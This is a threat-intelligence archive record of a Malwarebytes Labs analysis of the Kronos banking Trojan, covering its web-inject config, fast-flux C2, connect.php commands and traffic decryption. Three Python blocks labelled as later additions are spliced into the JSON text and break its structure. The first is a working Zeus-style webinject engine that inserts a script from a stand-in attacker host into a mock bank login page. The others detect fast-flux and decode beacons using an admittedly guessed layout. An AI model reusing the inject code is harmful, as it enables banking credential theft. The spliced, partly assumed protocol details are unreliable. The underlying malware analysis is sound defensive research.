{
	"id": "9adc368e-eedb-44e6-8e9a-9d44658a1ae1",
	"created_at": "2026-04-06T00:18:30.893683Z",
	"updated_at": "2026-04-10T03:22:05.910304Z",
	"deleted_at": null,
	"sha1_hash": "4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab",
	"title": "Inside the Kronos malware - part 2 | Malwarebytes Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 885726,
	"plain_text": "Inside the Kronos malware - part 2 | Malwarebytes Labs\r\nBy Malwarebytes Labs\r\nPublished: 2017-08-28 · Archived: 2026-04-05 13:44:37 UTC\r\nIn the previous part of the Kronos analysis, we took a look at the installation process of Kronos and explained the technical details of the tricks that this malware uses in order to remain stealthy. Now we will move on to the malicious actions that Kronos can perform.\r\nAnalyzed samples\r\nede01f7431543c1fef546f8e1d693a85 – downloader (a .doc with a malicious macro)\r\n2a550956263a22991c34f076f3160b49 – main bot (packed)\r\nSpecial thanks to @shotgunner101 and @chrisdoman for sharing the samples.\r\nConfiguration and targets\r\nKronos is known as a banking Trojan. To enable and configure this feature, the bot may download an additional configuration file from its CnC. After being fetched, it is stored in the installation folder in encrypted form. (It is worth noting that when the config is sent over the network it is encrypted with AES in CBC mode, but when it is stored on disk, AES in ECB mode is used. ECB maps identical 16-byte plaintext blocks to identical ciphertext blocks, so the stored copy leaks more structure than the transported one.)\r\nBelow you can see an example of the installation folder of Kronos, created in %APPDATA%/Microsoft. The folder name is further used as the BotId. Both stored files, the executable and the configuration, have the same name and differ only by the extension:\r\nHere you can see the captured configuration file in decrypted form:\r\nhttps://gist.github.com/malwarezone/d6de3d53395849123596f5d9e68fe3a3#file-config-txt\r\nThe format of the configuration follows the standard defined by the famous Zeus malware.\r\nhttps://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/\r\nPage 1 of 14\n\nThe config specifies the external script that is going to be injected into the targeted website, as well as the place of the injection. 
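A worked example of the kind of inject entry just described, added here and not taken from the original post or from Kronos itself. The directive names are the Zeus webinject convention the post says Kronos follows (set_url, data_before, data_inject, data_after, data_end); the attacker host name, the stand-in bank login page and the URL mask are constructed placeholders, and the script name is the one the post mentions. The code parses such entries and applies them to a page the way a browser-side hook would, replacing whatever sits between the data_before and data_after anchors with the injected markup:

```python
import fnmatch
from dataclasses import dataclass

# Constructed inject entry in the Zeus webinject format that the post says the
# Kronos config follows. The directive names are the Zeus convention; the
# attacker host is a placeholder, the script name is the one from the post.
SAMPLE_CONFIG = '''
set_url https://*.wellsfargo.com/* GP
data_before
<head>
data_end
data_inject
<script src='https://attacker.invalid/figrabber.js'></script>
data_end
data_after
data_end
'''

# Constructed stand-in for a bank login page, not the real site.
SAMPLE_PAGE = '<html><head><title>Sign On</title></head><body><form id=login></form></body></html>'


@dataclass
class Inject:
    url_mask: str   # wildcard mask matched against the URL the browser loads
    flags: str      # Zeus flags: G = apply on GET, P = apply on POST
    before: str = ''
    inject: str = ''
    after: str = ''


def parse_webinjects(text):
    '''Parse set_url / data_* blocks into Inject records.'''
    injects, current, section, buf = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith('set_url '):
            parts = stripped.split()
            current = Inject(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else '')
            injects.append(current)
        elif stripped in ('data_before', 'data_inject', 'data_after'):
            section, buf = stripped[len('data_'):], []
        elif stripped == 'data_end':
            if current is not None and section is not None:
                setattr(current, section, chr(10).join(buf))   # chr(10) is a newline
            section = None
        elif section is not None:
            buf.append(line)
    return injects


def matching_injects(url, injects):
    '''Injects whose mask matches the URL; * matches any run of characters.'''
    return [i for i in injects if fnmatch.fnmatchcase(url, i.url_mask)]


def apply_inject(html, inject):
    '''Zeus semantics: the text between data_before and data_after is replaced
    by data_inject. With an empty data_after the markup is inserted right after
    data_before; if an anchor is missing, the page is left untouched.'''
    start = 0
    if inject.before:
        pos = html.find(inject.before)
        if pos < 0:
            return html, False
        start = pos + len(inject.before)
    end = start
    if inject.after:
        pos = html.find(inject.after, start)
        if pos < 0:
            return html, False
        end = pos
    return html[:start] + inject.inject + html[end:], True


def inject_page(url, html, injects):
    '''Apply every matching inject; return the modified page and how many applied.'''
    applied = 0
    for inj in matching_injects(url, injects):
        html, ok = apply_inject(html, inj)
        applied += int(ok)
    return html, applied


if __name__ == '__main__':
    page, n = inject_page('https://connect.secure.wellsfargo.com/auth/login/present',
                          SAMPLE_PAGE, parse_webinjects(SAMPLE_CONFIG))
    print(n, page)
```

The decision whether an inject applies is made on the URL the browser is loading (and, via the G/P flags, on the request method), which is why config targets are written as wildcard masks rather than exact URLs. A missing anchor leaves the page untouched, so even a small change to the target site's HTML silently disables the inject until the config is refreshed.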
Below you can see a fragment of the configuration for a sample target – Wells Fargo Bank:\r\nIn the given example, the injected script is figrabber.js. It is hosted on the attacker's server:\r\nThe current configuration targets several banks, but also steals credentials for popular services like Google, Twitter, and Facebook.\r\nIndeed, if we open the websites that are targeted by the malware we can see that the injects have been performed. The fragments of code that were defined in the config are implanted in the source of the legitimate website. Some examples are included below:\r\nFacebook:\r\nCitibank:\r\nThe injected scripts are responsible for opening an additional pop-up that tries to phish the user and steal his/her personal data:\r\nWells Fargo:\r\nMore cases, and their comparison with the normal behavior of the site before the infection, are demonstrated in the video:\r\nThe form is customized to fit the theme of each page. However, its content is the same for each target. Overall, the attack is not very sophisticated and it will probably look suspicious to more advanced users. It is based purely on social engineering – trying to convince the user to input all the personal data that are necessary for banking operations:\r\nDownloader\r\nApart from infecting browsers and stealing data, Kronos also has a downloader feature. During our tests, it downloaded a new executable and saved it in %TEMP%. 
Payloads are stored in an additional directory with the same name as the main installation directory:\r\nDownloaded payload:\r\n6f7f79dd2a2bf58ba08d03c64ead5ced – nCBngA.exe\r\nThe payload is downloaded from the Kronos CnC:\r\n…in unencrypted form:\r\nIn the analyzed case, the downloaded payload was just an update of the Kronos bot. However, the same feature may also be used for fetching and deploying other malware families.\r\nCommand and Control (CnC) server\r\nIn the analyzed case, Kronos used the Fast-Flux technique for its CnC. The domain was resolved to a different IP each time. For example, the domain hjbkjbhkjhbkjhl.info was resolved to an IP address randomly picked from the pool given below:\r\n46.175.146.50 46.172.209.210 47.188.161.114 74.109.250.65 77.122.51.88 77.122.51.88 89.25.31.94 89.18\r\nWatching the communication with the CnC, we observed queries to the site connect.php, with an optional parameter a:\r\nconnect.php - initial beacon\r\nconnect.php?a=0 - sending data to the CnC\r\nconnect.php?a=1 - downloading\r\nCnC panel\r\nThanks to the code of the CnC panel that leaked online, we can have more insight into all the functionalities and their implementation. Like most malware panels, the Kronos panel is written in PHP and uses a MySQL database. 
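As an added example (not part of the original post), here is a small detector for the fast-flux behavior described in the Command and Control section above, run over a constructed resolver log whose answers for hjbkjbhkjhbkjhl.info come from the IP pool listed there. The timestamps, the two benign names and their documentation-range addresses are made up for the example:

```python
import ipaddress
from collections import defaultdict

# Constructed resolver log (timestamp, name, record type, answer). The answers
# for the Kronos domain are drawn from the IP pool listed in the post; the
# other two names and their documentation-range addresses are filler.
SAMPLE_DNS_LOG = '''
2017-08-10T10:00:01Z hjbkjbhkjhbkjhl.info A 46.175.146.50
2017-08-10T10:00:31Z hjbkjbhkjhbkjhl.info A 46.172.209.210
2017-08-10T10:01:02Z hjbkjbhkjhbkjhl.info A 47.188.161.114
2017-08-10T10:01:33Z hjbkjbhkjhbkjhl.info A 74.109.250.65
2017-08-10T10:02:04Z hjbkjbhkjhbkjhl.info A 77.122.51.88
2017-08-10T10:02:35Z hjbkjbhkjhbkjhl.info A 77.122.51.88
2017-08-10T10:03:06Z hjbkjbhkjhbkjhl.info A 89.25.31.94
2017-08-10T10:00:05Z cdn.example.net A 198.51.100.10
2017-08-10T10:01:05Z cdn.example.net A 198.51.100.11
2017-08-10T10:02:05Z cdn.example.net A 198.51.100.10
2017-08-10T10:03:05Z cdn.example.net A 198.51.100.11
2017-08-10T10:00:09Z www.example.org A 203.0.113.7
2017-08-10T10:02:09Z www.example.org A 203.0.113.7
'''


def parse_dns_log(text):
    '''Return (timestamp, name, address) for every A answer in the log.'''
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, name, rtype, answer = line.split()
        if rtype == 'A':
            records.append((ts, name.lower(), ipaddress.ip_address(answer)))
    return records


def flux_stats(records):
    '''Per-name counters: answers seen, distinct IPs, distinct /16 networks
    (a crude stand-in for provider diversity) and how often consecutive
    answers differ.'''
    answers = defaultdict(list)
    for _, name, ip in sorted(records):
        answers[name].append(ip)
    stats = {}
    for name, ips in answers.items():
        distinct = set(ips)
        nets = {ipaddress.ip_network(str(ip) + '/16', strict=False) for ip in distinct}
        changes = sum(1 for a, b in zip(ips, ips[1:]) if a != b)
        stats[name] = {
            'queries': len(ips),
            'distinct_ips': len(distinct),
            'distinct_slash16': len(nets),
            'change_rate': changes / max(len(ips) - 1, 1),
        }
    return stats


def suspected_fast_flux(stats, min_ips=4, min_nets=3, min_change_rate=0.5):
    '''Names whose answers rotate across many unrelated networks. Round-robin
    inside one provider block (cdn.example.net) stays below the thresholds;
    a single stable answer (www.example.org) trivially does too.'''
    return sorted(name for name, s in stats.items()
                  if s['distinct_ips'] >= min_ips
                  and s['distinct_slash16'] >= min_nets
                  and s['change_rate'] >= min_change_rate)


if __name__ == '__main__':
    stats = flux_stats(parse_dns_log(SAMPLE_DNS_LOG))
    for name in suspected_fast_flux(stats):
        print(name, stats[name])
```

The /16 grouping is only a rough proxy for unrelated networks; a production version would enrich answers with ASN data and also look at the short TTLs that fast-flux domains need, which the constructed log does not carry. Thresholds have to be tuned against a baseline, since large CDNs also spread answers across many prefixes.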
Overview of the files:\r\nIt turns out that in total the bot has three commands:\r\na=0 – sends the grabbed page content\r\na=1 – fetches the configuration file\r\na=2 – sends the logged windows\r\nBelow we can see the relevant fragments of the panel’s code (implemented inside connect.php), responsible for parsing and storing the data uploaded by the respective commands.\r\nCommand #0 ( a=0 ):\r\nCommand #2 ( a=2 ):\r\nThe configuration that is sent to the bot is prepared by the following code:\r\nCommand #1 ( a=1 ):\r\nWe can also see very clearly how the config is encrypted – using AES in CBC mode, where the key is the first 16 bytes of the MD5 of the BotId (this confirms what researchers from Lexsi lab found by reverse engineering).\r\nHowever, AES is not the only cryptographic algorithm utilized by Kronos. Other commands use Blowfish in ECB mode:\r\nCommand #0 ( a=0 ):\r\nCommand #2 ( a=2 ):\r\nIn all cases, there is a variable called UniqueId that is used as the key. 
The UniqueId is nothing more than the BotId, which is sent in every POST request in XOR-encoded form.\r\nYou can find the corresponding Python scripts for decoding the appropriate requests and responses here:\r\nhttps://github.com/hasherezade/malware_analysis/tree/master/kronos\r\nKronos also comes with the option of adding plugins that extend the core functionality:\r\nAs we may conclude, the plugins are capable of extending Kronos with some espionage capabilities, such as VNC (for viewing the desktop) and logging typed keystrokes.\r\nDecrypting the communication\r\nWith the help of the prepared scripts (available here), we can decrypt the important elements of the communication between the Kronos bot and the CnC server. Let’s assume that we have a PCAP file with captured traffic.\r\nThe BotId\r\nWe need to start by getting the Kronos BotId, because as we know it will be used to derive the encryption keys. We will find it in the requests sent by the bot to its CnC (74 bytes long):\r\nAfter dumping the request, we can use the following script to decode it:\r\n./kronos_beacon_decoder.py --infile dump1.bin\r\nAs the output we will get the decoded beacon, consisting of:\r\n1. Hash of the configuration file (if no configuration file was present at the moment, this part will be filled with “X” characters)\r\n2. The BotId\r\nExample:\r\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX{117BB161-6479-4624-858B-4D2CE81593A2}\r\nSo, in the demonstrated case the BotId is {117BB161-6479-4624-858B-4D2CE81593A2}.\r\nThe configuration\r\nHaving the BotId, we can move on to decrypting the configuration. 
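To tie the protocol pieces together before moving on, here is an added example (not code from the original post or from hasherezade's scripts) that classifies connect.php requests by their a parameter, decodes a beacon and derives the configuration key from the BotId. The post reports only that the BotId is sent XOR-encoded and that the beacon is 74 bytes, so the layout used here (a 4-byte XOR key in front of the hash and the BotId) is a constructed stand-in that happens to fit that length, not the real Kronos format; likewise, whether the MD5 is computed over the braced GUID and truncated as a hex string is an assumption. The BotId itself is the one from the decoded beacon above.

```python
import hashlib
from urllib.parse import parse_qs, urlsplit

# BotId taken from the decoded beacon shown in the post.
BOTID = '{117BB161-6479-4624-858B-4D2CE81593A2}'

# Meaning of the optional a parameter of connect.php, as described in the post.
COMMANDS = {
    None: 'initial beacon',
    '0': 'send grabbed page content',
    '1': 'fetch configuration',
    '2': 'send logged windows',
}


def classify_request(request_line):
    '''Map an HTTP request line (e.g. POST /connect.php?a=1 HTTP/1.1) to the
    Kronos command it carries; None if it is not a connect.php request.'''
    method, target, _version = request_line.split(' ', 2)
    parts = urlsplit(target)
    if not parts.path.endswith('/connect.php'):
        return None
    a = parse_qs(parts.query).get('a', [None])[0]
    return COMMANDS.get(a, 'unknown')


def xor_bytes(data, key):
    '''Repeating-key XOR; applying it twice restores the input.'''
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_beacon(config_hash_hex, botid, key):
    '''Assumed beacon layout: a 4-byte XOR key followed by XOR(hash || BotId).
    4 + 32 + 38 = 74 bytes, the length the post reports, but the post does not
    show the real layout, so this is a stand-in for illustration only.'''
    payload = (config_hash_hex or 'X' * 32).encode() + botid.encode()
    return key + xor_bytes(payload, key)


def decode_beacon(blob):
    '''Inverse of encode_beacon: returns (config_hash or None, BotId).'''
    key, body = blob[:4], blob[4:]
    text = xor_bytes(body, key).decode('ascii')
    config_hash, botid = text[:32], text[32:]
    if len(botid) != 38 or botid[0] != '{' or botid[-1] != '}':
        raise ValueError('decoded BotId is not a braced GUID: wrong layout or key')
    return (None if config_hash == 'X' * 32 else config_hash), botid


def config_key(botid):
    '''Key for the a=1 configuration. The post says it is the first 16 bytes of
    the MD5 of the BotId; since a raw MD5 digest is already 16 bytes, this
    example assumes the hex digest truncated to 16 characters, hashed over the
    braced GUID string. Both points are assumptions, not from the post.'''
    return hashlib.md5(botid.encode('ascii')).hexdigest()[:16].encode('ascii')


# Constructed beacon: no config present yet (32 X characters), key chosen arbitrarily.
SAMPLE_BEACON = encode_beacon(None, BOTID, bytes([0x5A, 0x13, 0x9C, 0x2E]))


if __name__ == '__main__':
    print(classify_request('POST /connect.php HTTP/1.1'))
    print(decode_beacon(SAMPLE_BEACON))
    print(config_key(BOTID))
```

The key returned by config_key is what the a=1 response is decrypted with (AES in CBC mode, per the panel code); the a=0 and a=2 reports use Blowfish in ECB mode under the same BotId, for which the standard library has no primitive, so that step is left to the decoder scripts linked above. The configuration is the next thing to recover.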
The configuration arrives in the response to the a=1 request:\r\nExample of the request followed by the encrypted response from the CnC:\r\nAfter dumping the response, we can use another script to decode it, giving the BotId as a parameter:\r\n./kronos_a1_decoder.py --datafile dump2.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}\r\nAs a result, we will get the configuration file. Example of the decoded config:\r\nhttps://gist.github.com/malwarezone/a7fc13d4142da0c6a67b5e575156c720#file-config-txt\r\nThe sent reports\r\nSometimes we can find the Kronos bot reporting to the CnC in a=0 or a=2 requests:\r\nExample of the encrypted request:\r\nFinding out exactly what data was stolen by Kronos is not difficult if we dump the data and use the dedicated script:\r\n./kronos_a02_decoder.py --datafile dump3.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}\r\nExample of the decoded report: https://gist.github.com/malwarezone/a03fa49de475dfbdb7c499ff2bbb3314#file-a0_req-txt\r\nConclusion\r\nIn terms of code quality, Kronos is written in a decent way; however, its features are nothing novel. Although the bot got good reviews on underground forums, in terms of popularity it was always lagging behind. Probably its relatively high price was the important factor in why it lost to its competitors.\r\nAppendix\r\nSee also:\r\n/blog/cybercrime/2017/08/inside-kronos-malware/\r\nThis was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into the details of malware and sharing threat information with the community. 
Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.\r\nSource: https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/"
	],
	"report_names": [
		"inside-kronos-malware-p2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434710,
	"ts_updated_at": 1775791325,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab.pdf",
		"text": "https://archive.orkl.eu/4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab.txt",
		"img": "https://archive.orkl.eu/4f9f4ad01d95f3ef744d33a618f5ae73fbb87bab.jpg"
	}
}